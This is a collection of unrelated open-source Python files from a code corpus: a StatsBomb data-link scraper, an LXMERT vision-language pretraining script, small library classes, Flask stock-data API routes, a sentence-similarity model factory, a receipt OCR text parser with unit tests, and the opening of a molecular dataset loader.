df_lineup['player_id'] = df_lineup.player_id.astype(np.int64)
# sort and reset index: ready for exporting to feather
df_lineup.sort_values('player_id', inplace=True)
df_lineup.reset_index(inplace=True, drop=True)
return df_lineup
def _get_links(url):
# imports here as don't expect these functions to be used all the time
from bs4 import BeautifulSoup
import urllib.request
response = urllib.request.urlopen(url)
soup = BeautifulSoup(response, 'html.parser',
from_encoding=response.info().get_param('charset'))
links = soup.find_all('a', href=True)
return links
def get_match_links():
""" Returns a list of links to the StatsBomb open-data match jsons."""
match_url = 'https://github.com/statsbomb/open-data/tree/master/data/matches'
match_folders = _get_links(match_url)
match_folders = [(f'https://github.com/{link["href"]}',
link['title']) for link in match_folders
if '/tree/master/data/matches' in link['href']]
match_files = []
for link, folder in match_folders:
json_links = _get_links(link)
json_links = [f'{MATCH_SLUG}/{folder}/{link["title"]}' for link in json_links
if link['href'][-4:] == 'json']
match_files.extend(json_links)
return match_files
def get_event_links():
""" Returns a list of links to the StatsBomb open-data event jsons."""
url = 'https://github.com/statsbomb/open-data/tree/master/data/events'
links = _get_links(url)
links = [f'{EVENT_SLUG}/{link["title"]}' for link in links if link['href'][-4:] == 'json']
return links
def get_lineup_links():
""" Returns a list of links to the StatsBomb open-data lineup jsons."""
url = 'https://github.com/statsbomb/open-data/tree/master/data/lineups'
links = _get_links(url)
event_files = [f'{LINEUP_SLUG}/{link["title"]}' for link in links
if link['href'][-4:] == 'json']
return event_files
|
CLIP-ViL-Pretrain/src/pretrain/lxmert_pretrain.py
|
OdedH/CLIP-ViL
| 220 |
85237
|
<reponame>OdedH/CLIP-ViL
# coding=utf-8
# Copyleft 2019 project LXRT.
import collections
import os
import random
from tqdm import tqdm
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from param import args
from pretrain.lxmert_data import InputExample, LXMERTDataset, LXMERTTorchDataset, LXMERTEvaluator
from lxrt.entry import set_visual_config
from lxrt.tokenization import BertTokenizer
from lxrt.modeling import LXRTPretraining
import torch.distributed as dist
from torch.utils.data.distributed import DistributedSampler
import torch.distributed as dist
from src.tasks.vision_helpers import GroupedBatchSampler, create_aspect_ratio_groups_cache
from lxrt.visual_transformers import adjust_learning_rate
from src.tools.load_stagte_dict import load_state_dict_flexible_with_fp16, load_state_dict_flexible
import gc
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
DataTuple = collections.namedtuple("DataTuple", 'dataset torchdset loader evaluator')
if args.distributed:
dist.init_process_group(backend='nccl')
torch.cuda.set_device(args.local_rank)
args.gpus = torch.cuda.device_count()
args.world_size = args.gpus * args.nodes
args.gpus = torch.cuda.device_count()
args.gpu = args.local_rank if args.local_rank != -1 else 0
args.device = torch.device("cuda", args.gpu)
def get_tuple(splits: str, bs: int, shuffle=False, drop_last=False, topk=-1, distributed = False, aspect_ratio_group_factor= -1) -> DataTuple:
# Decide which QA datasets would be used in pre-training.
# Options: vqa, gqa, visual7w
# Note: visual7w is a part of vgqa, we take the name here.
qa_sets = args.qa_sets
if qa_sets is not None:
qa_sets = set(qa_set.lower().strip() for qa_set in qa_sets.split(","))
# Build dataset, data loader, and evaluator.
dset = LXMERTDataset(splits, qa_sets=qa_sets)
tset = LXMERTTorchDataset(dset, topk)
if distributed:
train_sampler = DistributedSampler(
tset,
num_replicas=args.world_size,
rank=args.local_rank,
shuffle=shuffle,
)
else:
train_sampler = torch.utils.data.RandomSampler(tset)
if not shuffle:
train_sampler = torch.utils.data.SequentialSampler(tset)
if aspect_ratio_group_factor >= 0:
group_ids = create_aspect_ratio_groups_cache(tset, k=args.aspect_ratio_group_factor)
train_batch_sampler = GroupedBatchSampler(train_sampler, group_ids, bs)
else:
train_batch_sampler = torch.utils.data.BatchSampler(
train_sampler, bs, drop_last=True)
data_loader = DataLoader(
tset,
batch_sampler=train_batch_sampler,
num_workers=args.num_workers,
collate_fn=tset.collate_fn,
pin_memory=True
)
evaluator = LXMERTEvaluator(dset)
print()
return DataTuple(dataset=dset, torchdset=tset, loader=data_loader, evaluator=evaluator)
train_tuple = get_tuple(args.train, args.batch_size, shuffle=True, drop_last=True, distributed=args.distributed, aspect_ratio_group_factor = args.aspect_ratio_group_factor)
valid_batch_size = 16 if args.multiGPU else 16
valid_tuple = get_tuple(args.valid, valid_batch_size, shuffle=False, drop_last=False, topk=5000)
LOSSES_NAME = ('Mask_LM', 'Matched', 'Obj', 'Attr', 'Feat', 'QA')
def to_gpu(tensor, device = None):
if tensor is not None and isinstance(tensor, torch.Tensor):
if device is not None:
return tensor.to(device)
else:
return tensor.cuda()
return tensor
class LXMERT:
def __init__(self, max_seq_length):
super().__init__()
self.max_seq_length = max_seq_length
self.tokenizer = BertTokenizer.from_pretrained(
"bert-base-uncased",
do_lower_case=True
)
# Build model
set_visual_config(args)
self.model = LXRTPretraining.from_pretrained(
"bert-base-uncased",
task_mask_lm=args.task_mask_lm,
task_obj_predict=args.task_obj_predict,
task_matched=args.task_matched,
task_qa=args.task_qa,
visual_losses=args.visual_losses,
num_answers=train_tuple.dataset.answer_table.num_answers
)
# Weight initialization and loading
if args.from_scratch:
print("Train from Scratch: re-initialize all BERT weights.")
self.model.apply(self.model.init_bert_weights)
if args.load_lxmert is not None:
# Load lxmert would not load the answer head.
self.load_lxmert(args.load_lxmert)
#print(list(state_dict))
self.model = self.model.to(args.device)
if args.distributed:
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
},
]
from transformers import AdamW, get_linear_schedule_with_warmup
if args.use_separate_optimizer_for_visual:
from lxrt.visual_transformers import FusedOptimizer
optimizer_grouped_parameters = [
{
"params": [p for n, p in self.model.named_parameters() if ( (not any(nd in n for nd in no_decay)) and ("visual_model" not in n) ) ],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in self.model.named_parameters() if ( (any(nd in n for nd in no_decay)) and ("visual_model" not in n ))],
"weight_decay": 0.0,
},
]
optim = AdamW(optimizer_grouped_parameters,
lr=args.lr,
#betas=(0.9, 0.98),
eps=args.adam_epsilon)
#sgd_parameters = self.model.bert.encoder.visual_model.parameters()
if args.use_adam_for_visual:
optimizer_grouped_parameters = [
{
"params": [p for n, p in self.model.bert.encoder.visual_model.named_parameters() if ( (not any(nd in n for nd in no_decay)) and ("visual_model" not in n) ) ],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in self.model.bert.encoder.visual_model.named_parameters() if ( (any(nd in n for nd in no_decay)) and ("visual_model" not in n ))],
"weight_decay": 0.0,
},
]
sgd = AdamW(optimizer_grouped_parameters,
lr=args.sgd_lr,
#betas=(0.9, 0.98),
eps=args.adam_epsilon)
else:
sgd = torch.optim.SGD(self.model.bert.encoder.visual_model.parameters(), args.sgd_lr,
momentum=args.sgd_momentum,
weight_decay=args.sgd_weight_decay)
self.optim = FusedOptimizer([optim, sgd])
batch_per_epoch = len(train_tuple.loader)
t_total = int(batch_per_epoch * args.epochs) // args.gradient_accumulation_steps
self.scheduler = get_linear_schedule_with_warmup(
optim, num_warmup_steps=args.warmup_ratio * t_total, num_training_steps=t_total)
else:
self.optim = AdamW(optimizer_grouped_parameters,
lr=args.lr,
#betas=(0.9, 0.98),
eps=args.adam_epsilon)
batch_per_epoch = len(train_tuple.loader)
t_total = int(batch_per_epoch * args.epochs) // args.gradient_accumulation_steps
self.scheduler = get_linear_schedule_with_warmup(
self.optim, num_warmup_steps=args.warmup_ratio * t_total, num_training_steps=t_total
)
if args.fp16:
if args.use_separate_optimizer_for_visual:
self.model, [optim, sgd] = amp.initialize(self.model, self.optim.optimizers, enabled=args.fp16, opt_level=args.fp16_opt_level)
self.optim = FusedOptimizer([optim, sgd])
else:
self.model, self.optim = amp.initialize(self.model, self.optim, enabled=args.fp16, opt_level=args.fp16_opt_level)
from apex.parallel import DistributedDataParallel as DDP
self.model = DDP(self.model)
else:
self.model = torch.nn.parallel.DistributedDataParallel(
self.model, device_ids=[args.gpu], find_unused_parameters=True
)
else:
# GPU Options
if args.multiGPU:
self.model = nn.DataParallel(self.model)
# Optimizer
from lxrt.optimization import BertAdam
batch_per_epoch = len(train_tuple.loader)
t_total = int(batch_per_epoch * args.epochs)
warmup_ratio = 0.05
warmup_iters = int(t_total * warmup_ratio)
print("Batch per epoch: %d" % batch_per_epoch)
print("Total Iters: %d" % t_total)
print("Warm up Iters: %d" % warmup_iters)
self.optim = BertAdam(self.model.parameters(), lr=args.lr, warmup=warmup_ratio, t_total=t_total)
if args.load is not None:
self.load(args.load)
torch.cuda.empty_cache()
gc.collect()
def forward(self, examples):
'''train_features = [convert_example_to_features(example, self.max_seq_length, self.tokenizer)
for example in examples]
# language Inputs
input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long).cuda()
input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long).cuda()
segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long).cuda()
# Visual Inputs
feats = torch.from_numpy(np.stack([f.visual_feats[0] for f in train_features])).cuda()
pos = torch.from_numpy(np.stack([f.visual_feats[1] for f in train_features])).cuda()
# Language Prediction
lm_labels = torch.tensor([f.lm_label_ids for f in train_features], dtype=torch.long).cuda()
# Visual Prediction
obj_labels = {}
for key in ('obj', 'attr', 'feat'):
visn_labels = torch.from_numpy(np.stack([f.obj_labels[key][0] for f in train_features])).cuda()
visn_mask = torch.from_numpy(np.stack([f.obj_labels[key][1] for f in train_features])).cuda()
assert visn_labels.size(0) == visn_mask.size(0) and visn_labels.size(1) == visn_mask.size(1)
obj_labels[key] = (visn_labels, visn_mask)
# Joint Prediction
matched_labels = torch.tensor([f.is_matched for f in train_features], dtype=torch.long).cuda()
ans = torch.from_numpy(np.stack([f.ans for f in train_features])).cuda() '''
"""
forward(self, input_ids, token_type_ids=None, attention_mask=None, masked_lm_labels=None,
visual_feats=None, pos=None, obj_labels=None, matched_label=None, ans=None):
"""
new_examples = {}
for key in list(examples.keys()):
if key != "uid":
new_examples[key] = to_gpu(examples[key])
loss, losses, ans_logit = self.model(
**new_examples
)
return loss, losses.detach().cpu(), ans_logit
def valid_batch(self, batch):
with torch.no_grad():
loss, losses, ans_logit = self.forward(batch)
if args.multiGPU:
loss = loss.mean()
losses = losses.mean(0)
return loss.item(), losses.cpu().numpy(), ans_logit
def train(self, train_tuple: DataTuple, eval_tuple: DataTuple):
train_ld = train_tuple.loader
# Train
best_eval_loss = 9595.
for epoch in range(args.start_epoch, args.epochs):
# Train
self.model.train()
total_loss = 0.
total_losses = 0.
uid2ans = {}
from utils import TrainingMeter
train_meter = TrainingMeter()
if args.use_separate_optimizer_for_visual:
adjust_learning_rate(self.optim.optimizers[-1], epoch, args)
for i, batch in enumerate(tqdm(train_ld, total=len(train_ld))):
if args.skip_training and i == 4:
break
loss, losses, ans_logit = self.forward(batch)
if args.multiGPU:
loss = loss.mean()
losses = losses.squeeze(0)
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
if args.use_separate_optimizer_for_visual:
with amp.scale_loss(loss, self.optim.optimizers) as scaled_loss:
scaled_loss.backward()
else:
with amp.scale_loss(loss, self.optim) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
if (i + 1) % args.gradient_accumulation_steps == 0:
if args.fp16:
total_norm = torch.nn.utils.clip_grad_norm_(amp.master_params(self.optim), args.max_grad_norm)
else:
total_norm = torch.nn.utils.clip_grad_norm_(self.model.parameters(), args.max_grad_norm)
self.optim.step()
if args.distributed:
self.scheduler.step() # Update learning rate schedule
self.model.zero_grad()
#self.optim.step()
loss = loss.item()
losses = losses.cpu().numpy()
logit = ans_logit
total_loss += loss
total_losses += losses
if args.task_qa:
score, label = logit.max(1)
for uid, l in zip(batch["uid"], label.cpu().numpy()):
ans = train_tuple.dataset.answer_table.id2ans(l)
uid2ans[uid] = ans
train_meter.update(
{'totol_loss': loss*args.gradient_accumulation_steps,
"masked_lm": losses[0],
"matched": losses[1],
"qa_loss": losses[2] if len(losses) == 3 else 0.0,
}
)
if i != 0 and i % args.report_step == 0 and args.local_rank <= 0:
print("Epoch {}, Training Step {} of {}".format(epoch, i // args.gradient_accumulation_steps, len(train_ld) // args.gradient_accumulation_steps ))
train_meter.report()
train_meter.clean()
if i != 0 and args.save_step != -1 and (i // args.gradient_accumulation_steps) % args.save_step == 0 and args.local_rank <= 0:
self.save("Epoch{}Step{}".format(epoch+1, i // args.gradient_accumulation_steps ))
#if args.task_qa:
# train_tuple.evaluator.evaluate(uid2ans, pprint=True)
# Save
if args.local_rank <= 0:
self.save("Epoch%02d" % (epoch+1))
# Eval
#avg_eval_loss = self.evaluate_epoch(eval_tuple, iters=-1)
def evaluate_epoch(self, eval_tuple: DataTuple, iters: int=-1):
self.model.eval()
eval_ld = eval_tuple.loader
total_loss = 0.
total_losses = 0.
uid2ans = {}
for i, batch in enumerate(tqdm(eval_ld)):
loss, losses, logit = self.valid_batch(batch)
total_loss += loss
total_losses += losses
if args.task_qa:
score, label = logit.max(1)
for uid, l in zip(batch["uid"], label.cpu().numpy()):
ans = train_tuple.dataset.answer_table.id2ans(l)
uid2ans[uid] = ans
if i == iters:
break
if args.local_rank <= 0:
print("The valid loss is %0.4f" % (total_loss / len(eval_ld)))
losses_str = "The losses are "
total_losses = total_losses.squeeze(0)
for name, loss in zip(LOSSES_NAME, total_losses / len(eval_ld)):
losses_str += "%s: %0.4f " % (name, loss)
print(losses_str)
if args.task_qa:
eval_tuple.evaluator.evaluate(uid2ans, pprint=True)
return total_loss / len(eval_ld)
def save(self, name):
torch.save(self.model.state_dict(),
os.path.join(args.output, "%s_LXRT.pth" % name))
if args.use_separate_optimizer_for_visual:
torch.save(self.optim.optimizers[0].state_dict(), os.path.join(args.output, "%s_LXRT_AdamOptim.pth" % name))
torch.save(self.optim.optimizers[1].state_dict(), os.path.join(args.output, "%s_LXRT_SGDOptim.pth" % name))
else:
torch.save(self.optim.state_dict(), os.path.join(args.output, "%s_LXRT_AdamOptim.pth" % name))
torch.save(self.scheduler.state_dict(), os.path.join(args.output, "%s_LXRT_Scheduler.pth" % name))
def load(self, path):
print("Load BERT extractor from %s" % path)
state_dict = torch.load("%s_LXRT.pth" % path, map_location='cpu')
'''new_state_dict = {}
for key, value in state_dict.items():
if key.startswith("module."):
new_state_dict[key.replace("module.", "")] = value
else:
new_state_dict[key] = value'''
load_state_dict_flexible_with_fp16(self.model, state_dict)
#self.model.load_state_dict(new_state_dict)
if os.path.exists("{}_LXRT_SGDOptim.pth".format(path)):
# load sgd
print("Load SGD from {}".format("{}_LXRT_SGDOptim.pth".format(path)))
sgd_state = torch.load("{}_LXRT_SGDOptim.pth".format(path), map_location='cpu')
self.optim.optimizers[-1].load_state_dict(sgd_state)
if args.not_load_adam_optimizer:
pass
elif os.path.exists("{}_LXRT_AdamOptim.pth".format(path)):
# load sgd
print("Load Adam")
sgd_state = torch.load("{}_LXRT_AdamOptim.pth".format(path), map_location='cpu')
self.optim.optimizers[0].load_state_dict(sgd_state)
if args.not_load_scheduler:
pass
elif os.path.exists("{}_LXRT_Scheduler.pth".format(path)):
# load sgd
print('Load scheduler')
sgd_state = torch.load("{}_LXRT_Scheduler.pth".format(path), map_location='cpu')
self.scheduler.load_state_dict(sgd_state)
def load_lxmert(self, path):
print("Load LXMERT model from %s" % path)
state_dict = torch.load("%s_LXRT.pth" % path, map_location="cpu")
# Do not load any answer head
for key in list(state_dict.keys()):
if 'answer' in key:
state_dict.pop(key)
# Change Multi GPU to single GPU
new_state_dict = {}
for key, value in state_dict.items():
if key.startswith("module."):
new_state_dict[key[len("module."):]] = value
state_dict = new_state_dict
load_keys = set(state_dict.keys())
model_keys = set(self.model.state_dict().keys())
print()
print("Keys in loaded but not in model:")
for key in sorted(load_keys.difference(model_keys)):
print(key)
print()
print("Keys in model but not in loaded:")
for key in sorted(model_keys.difference(load_keys)):
print(key)
print()
load_state_dict_flexible_with_fp16(self.model, state_dict)
#self.model.load_state_dict(state_dict, strict=False)
if __name__ == "__main__":
import sys
if args.gpu == 0:
print("\n\n")
print(" ".join(sys.argv))
print("\n\n")
lxmert = LXMERT(max_seq_length=20)
lxmert.train(train_tuple, valid_tuple)
|
src/django_mysql/exceptions.py
|
harvardinformatics/django-mysql
| 502 |
85239
|
<reponame>harvardinformatics/django-mysql
class TimeoutError(Exception):
"""
Indicates a database operation timed out in some way.
"""
pass
|
fast_transformers/feature_maps/base.py
|
SamuelCahyawijaya/fast-transformers
| 1,171 |
85242
|
<filename>fast_transformers/feature_maps/base.py
#
# Copyright (c) 2020 Idiap Research Institute, http://www.idiap.ch/
# Written by <NAME> <<EMAIL>>
#
"""Create the feature map interface and some commonly used feature maps.
All attention implementations that expect a feature map shall receive a factory
function that returns a feature map instance when called with the query
dimensions.
"""
from functools import partial
import torch
from torch.nn import Module
class FeatureMap(Module):
"""Define the FeatureMap interface."""
def __init__(self, query_dims):
super().__init__()
self.query_dims = query_dims
def new_feature_map(self, device):
"""Create a new instance of this feature map. In particular, if it is a
random feature map sample new parameters."""
raise NotImplementedError()
def forward_queries(self, x):
"""Encode the queries `x` using this feature map."""
return self(x)
def forward_keys(self, x):
"""Encode the keys `x` using this feature map."""
return self(x)
def forward(self, x):
"""Encode x using this feature map. For symmetric feature maps it
suffices to define this function, but for asymmetric feature maps one
needs to define the `forward_queries` and `forward_keys` functions."""
raise NotImplementedError()
@classmethod
def factory(cls, *args, **kwargs):
"""Return a function that when called with the query dimensions returns
an instance of this feature map.
It is inherited by the subclasses so it is available in all feature
maps.
"""
def inner(query_dims):
return cls(query_dims, *args, **kwargs)
return inner
class ActivationFunctionFeatureMap(FeatureMap):
"""Define a feature map that is simply an element-wise activation
function."""
def __init__(self, query_dims, activation_function):
super().__init__(query_dims)
self.activation_function = activation_function
def new_feature_map(self, device):
return
def forward(self, x):
return self.activation_function(x)
elu_feature_map = ActivationFunctionFeatureMap.factory(
lambda x: torch.nn.functional.elu(x) + 1
)
|
fooltrader/rest/controller/tech.py
|
beaquant/fooltrader
| 1,103 |
85249
|
<filename>fooltrader/rest/controller/tech.py<gh_stars>1000+
# -*- coding: utf-8 -*-
from flask import request
from fooltrader.api.esapi import esapi
from fooltrader.rest import app
from fooltrader.rest.common import success, get_request_params_as_list
@app.route('/tech/kdata/<securityid>', methods=['GET'])
def get_kdata(securityid):
the_date = request.args.get('the_date')
start_date = request.args.get('start_date')
end_date = request.args.get('end_date')
level = request.args.get('level', 'day')
fields = request.args.get('fields')
if not fields:
fields = ['timestamp', 'open', 'high', 'low', 'close', 'volume']
from_idx = request.args.get('from_idx', 0)
size = request.args.get('size', 500)
result = esapi.es_get_kdata(security_item=securityid, the_date=the_date, start_date=start_date,
end_date=end_date, fields=fields, csv=True,
level=level, from_idx=int(from_idx), size=int(size))
return success(result)
@app.route('/tech/statistic/<securityid>', methods=['GET'])
def get_statistic(securityid):
the_date = request.args.get('the_date')
start_date = request.args.get('start_date')
end_date = request.args.get('end_date')
level = request.args.get('level', 'day')
from_idx = request.args.get('from_idx', 0)
size = request.args.get('size', 500)
result = esapi.es_get_statistic(security_item=securityid, the_date=the_date, start_date=start_date,
end_date=end_date, level=level, from_idx=int(from_idx), size=int(size))
return success(result)
@app.route('/tech/user_statistic/<main_chain>', defaults={'user_id': None}, methods=['GET'])
@app.route('/tech/user_statistic/<main_chain>/<user_id>', methods=['GET'])
def get_user_statistic(main_chain, user_id):
start_date = request.args.get('start_date')
end_date = request.args.get('end_date')
security_id = request.args.get('security_id', 'cryptocurrency_contract_RAM-EOS')
from_idx = request.args.get('from_idx', 0)
size = request.args.get('size', 100)
result = esapi.es_get_user_statistic(main_chain=main_chain, security_id=security_id, user_id=user_id,
start_date=start_date,
end_date=end_date, from_idx=int(from_idx), size=int(size))
return success(result)
@app.route('/tech/account/<main_chain>', defaults={'user_id': None}, methods=['GET'])
@app.route('/tech/account/<main_chain>/<user_id>', methods=['GET'])
def get_accounts(main_chain, user_id):
start_vol = request.args.get('start_vol')
end_vol = request.args.get('end_vol')
from_idx = request.args.get('from_idx', 0)
size = request.args.get('size', 100)
order = request.args.get('order', 'totalEos')
fields = get_request_params_as_list(request, 'fields')
result = esapi.es_get_accounts(main_chain=main_chain, user_id=user_id,
start_vol=int(start_vol), fields=fields,
end_vol=int(end_vol), from_idx=int(from_idx), size=int(size), order=order)
return success(result)
|
models/__init__.py
|
tuzhucheng/sent-sim
| 109 |
85287
|
<reponame>tuzhucheng/sent-sim
import numpy as np
import torch
from models.sentence_embedding_baseline import SmoothInverseFrequencyBaseline
from models.mpcnn import MPCNN
from models.mpcnn_lite import MPCNNLite
from models.bimpm import BiMPM
def get_model(args, dataset_cls, embedding):
if args.model == 'sif':
args.supervised = not args.unsupervised
args.remove_special_direction = not args.no_remove_special_direction
model = SmoothInverseFrequencyBaseline(dataset_cls.num_classes, args.alpha, embedding,
remove_special_direction=args.remove_special_direction,
frequency_dataset=args.frequency_dataset,
supervised=args.supervised)
elif args.model == 'mpcnn':
model = MPCNN(embedding, 300, 300, 20, [1, 2, 3, np.inf], 150, dataset_cls.num_classes, 0.5)
elif args.model == 'mpcnn-lite':
model = MPCNNLite(embedding, 300, 300, [1, 2, 3, np.inf], 150, dataset_cls.num_classes, 0.5)
elif args.model == 'bimpm':
model = BiMPM(embedding, 300, 50, 20, 100, dataset_cls.num_classes, 0.1)
else:
raise ValueError(f'Unrecognized dataset: {args.model}')
if args.device != -1:
with torch.cuda.device(args.device):
model = model.cuda()
return model
|
app/modules/ocr_utils/receiptparser.py
|
jasalt/kuittiskanneri
| 131 |
85321
|
<filename>app/modules/ocr_utils/receiptparser.py
# -*- coding: utf-8 -*-
import unittest
from datetime import datetime
testtext = u"""
k-supermarket länsiväylä
puh. 01042 33900
4 k4 m000004/1939 21:01 28-05-2014
sallinen maapähkinä lkg 4.40
valio rasvaton maito 1,51 1.55
elonen ruisevas 540g 9kpl 1.59
pirkka banaani 0.75
es tonnikalahiutale 185/1409 vedessä 0.79
pirkka maksamakkara 300g 1.00
yhteensä 10.08
korttitapahtuma
kortti visa electron
*mu: *n* *m* 7956 cp
sovellus la us: a000oo00032010
tap.nro/varmennus 00942/151372
yritys/ala 020327326100/5411
autbnt1901ntli cf70d1e6903fcb8a
visa he: 1405223010942
debit/veloitus 10,03 eur
alv veroton vero verollinen
2 14.00% 8.84 1.24 10.08
yhteensä 8.84 1.24 10.08"""
def parse_float(txt):
""" Returns None or parsed float value. """
# Floats must have decimal point
if txt.find('.') == -1:
return None
# Parse float using python's built-in converter
try:
return float(txt)
except ValueError:
return None
def parse_date(txt):
""" Returns None or parsed date as {h, m, D, M, Y}. """
date = None
clock = None
for word in txt.split(' '):
if date is None:
try:
date = datetime.strptime(word, "%d-%m-%Y")
continue
except ValueError:
pass
try:
date = datetime.strptime(word, "%d.%m.%Y")
continue
except ValueError:
pass
if clock is None:
try:
clock = datetime.strptime(word, "%H:%M")
continue
except ValueError:
pass
if date is not None and clock is not None:
return {'h': clock.hour,
'm': clock.minute,
'D': date.day,
'M': date.month,
'Y': date.year}
return None
def parse_product_line(txt):
""" Returns None or {name, price}
Example: { name:'<NAME>', price: 0.75 }
"""
invalid_starts = ['yhtee', 'k-plussa', 'plussaa']
words = txt.split(' ')
if len(words) >= 2:
# Lines starting with any of invalid_starts are not products
if not any([words[0].startswith(s) for s in invalid_starts]):
# Price is the last word of the line
price = parse_float(words[-1])
if price is not None:
product_name = ' '.join(words[0:-1])
# Calculate percentage of digits in product_name
number_acc = lambda acc, c: acc + (1 if c.isdigit() else 0)
characters = float(len(product_name))
digit_percent = reduce(number_acc, product_name, 0) / characters
# Names with over 50% digits are not product names
if digit_percent > 0.5:
return None
return {'name': product_name, 'price': float("{0:.2f}".format(price))}
return None
def parse_sum(txt):
""" Returns None or total sum as float. """
words = txt.split(' ')
if len(words) >= 2:
if words[0].startswith('yhtee'):
# Try float parsing
total_sum = parse_float(words[-1])
if total_sum is not None:
# Return sum with 2 decimal precision
return float("{0:.2f}".format(total_sum))
return None
def parse_credit_card(txt):
""" Returns None or True. """
if txt.startswith('korttitapahtuma'):
return True
return None
def preprocess(txt):
""" Removes empty lines and unnecessary whitespace. """
return [line.strip() for line in txt.splitlines() if line.strip() != ""]
def parse_receipt(txt):
""" Parses receipt and returns parsed data. """
result = { 'products': [],
'date': None,
'total_sum': None,
'shop_name': None,
'credit_card': False }
preprocessed_lines = preprocess(txt)
if len(preprocessed_lines) == 0:
return result
result['shop_name'] = preprocessed_lines[0]
for line in preprocessed_lines:
parsed_product = parse_product_line(line)
if parsed_product is not None:
result['products'].append(parsed_product)
parsed_sum = parse_sum(line)
if parsed_sum is not None:
result['total_sum'] = parsed_sum
parsed_card = parse_credit_card(line)
if parsed_card is not None:
result['credit_card'] = parsed_card
parsed_date = parse_date(line)
if parsed_date is not None:
result['date'] = parsed_date
return result
class ParserTest(unittest.TestCase):
""" Tests all receipt parser functions. """
def test_float(self):
""" Tests parse_float """
test = lambda inp, expected:\
self.assertEqual(parse_float(inp), expected)
# Valid floats
test('0.00', 0.0)
test('13.75', 13.75)
test(u'0.05', 0.05)
# Invalid floats
test('', None)
test(' ', None)
test('abc', None)
def test_product_line(self):
""" Tests parse_product_line """
test = lambda inp, expected:\
self.assertEqual(parse_product_line(inp), expected)
# Valid product lines
test('valio rasvaton maito 1,5l 1.55', \
{'name': 'valio rasvaton maito 1,5l', 'price': 1.55})
test('pirkka maksamakkara 300g 1.00', \
{'name': 'pirkka maksamakkara 300g', 'price': 1.00})
test(u'sallinen maapähkinä 1kg 4.40', \
{'name': u'sallinen maapähkinä 1kg', 'price': 4.4})
# Invalid product lines
test('4 k4 m000004/1939 21:01 28-05-2014', None)
test('yhteensä 8.84 1.24 10.08', None)
test('puh. 01042 33900', None)
test(u'korttitapahtuma', None)
test("2 14.0q% 9.95 1.39 11.34", None)
def test_sum(self):
""" Tests parse_sum """
test = lambda inp, expected:\
self.assertEqual(parse_sum(inp), expected)
# Valid sums
test(u'yhteensä 15.62', 15.62)
test(u'yhteensä 61.00', 61.00)
# Invalid sums
test(u'yhteensä 6i 00', None)
test('', None)
def test_date(self):
""" Tests parse_date """
test = lambda inp, expected:\
self.assertEqual(parse_date(inp), expected)
# Valid dates
test('15:57 27-07-2014', {'h':15,'m':57, 'D':27,'M':7,'Y':2014})
test('16.07.2014 23:15', {'h':23,'m':15, 'D':16,'M':7,'Y':2014})
# Invalid dates
test('64:99 12-13-2014', None)
test('abc', None)
test(' ', None)
test('', None)
if __name__ == '__main__':
unittest.main()
|
python/dgllife/data/csv_dataset.py
|
siboehm/dgl-lifesci
| 390 |
85369
|
<filename>python/dgllife/data/csv_dataset.py
# -*- coding: utf-8 -*-
#
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Creating datasets from .csv files for molecular property prediction.
import dgl.backend as F
import numpy as np
import os
import pandas as pd
import torch
from dgl.data.utils import save_graphs, load_graphs
from ..utils.io import pmap
__all__ = ['MoleculeCSVDataset']
class MoleculeCSVDataset(object):
"""MoleculeCSVDataset
This is a general class for loading molecular data from :class:`pandas.DataFrame`.
In data pre-processing, we construct a binary mask indicating the existence of labels.
All molecules are converted into DGLGraphs. After the first-time construction, the
DGLGraphs can be saved for reloading so that we do not need to reconstruct them every time.
Parameters
----------
df: pandas.DataFrame
Dataframe including smiles and labels. Can be loaded by pandas.read_csv(file_path).
One column includes smiles and some other columns include labels.
smiles_to_graph: callable, str -> DGLGraph
A function turning a SMILES string into a DGLGraph.
node_featurizer : None or callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for nodes like atoms in a molecule, which can be used to update
ndata for a DGLGraph.
edge_featurizer : None or callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for edges like bonds in a molecule, which can be used to update
edata for a DGLGraph.
smiles_column: str
Column name for smiles in ``df``.
cache_file_path: str
Path to store the preprocessed DGLGraphs. For example, this can be ``'dglgraph.bin'``.
task_names : list of str or None, optional
Columns in the data frame corresponding to real-valued labels. If None, we assume
all columns except the smiles_column are labels. Default to None.
load : bool, optional
Whether to load the previously pre-processed dataset or pre-process from scratch.
``load`` should be False when we want to try different graph construction and
featurization methods and need to preprocess from scratch. Default to False.
log_every : bool, optional
Print a message every time ``log_every`` molecules are processed. It only comes
into effect when :attr:`n_jobs` is greater than 1. Default to 1000.
init_mask : bool, optional
Whether to initialize a binary mask indicating the existence of labels. Default to True.
n_jobs : int, optional
The maximum number of concurrently running jobs for graph construction and featurization,
using joblib backend. Default to 1.
error_log : str, optional
Path to a CSV file of molecules that RDKit failed to parse. If not specified,
the molecules will not be recorded.
"""
def __init__(self, df, smiles_to_graph, node_featurizer, edge_featurizer, smiles_column,
cache_file_path, task_names=None, load=False, log_every=1000, init_mask=True,
n_jobs=1, error_log=None):
self.df = df
self.smiles = self.df[smiles_column].tolist()
if task_names is None:
self.task_names = self.df.columns.drop([smiles_column]).tolist()
else:
self.task_names = task_names
self.n_tasks = len(self.task_names)
self.cache_file_path = cache_file_path
self._pre_process(smiles_to_graph, node_featurizer, edge_featurizer,
load, log_every, init_mask, n_jobs, error_log)
# Only useful for binary classification tasks
self._task_pos_weights = None
def _pre_process(self, smiles_to_graph, node_featurizer, edge_featurizer,
load, log_every, init_mask, n_jobs, error_log):
"""Pre-process the dataset
* Convert molecules from smiles format into DGLGraphs
and featurize their atoms
* Set missing labels to be 0 and use a binary masking
matrix to mask them
Parameters
----------
smiles_to_graph : callable, SMILES -> DGLGraph
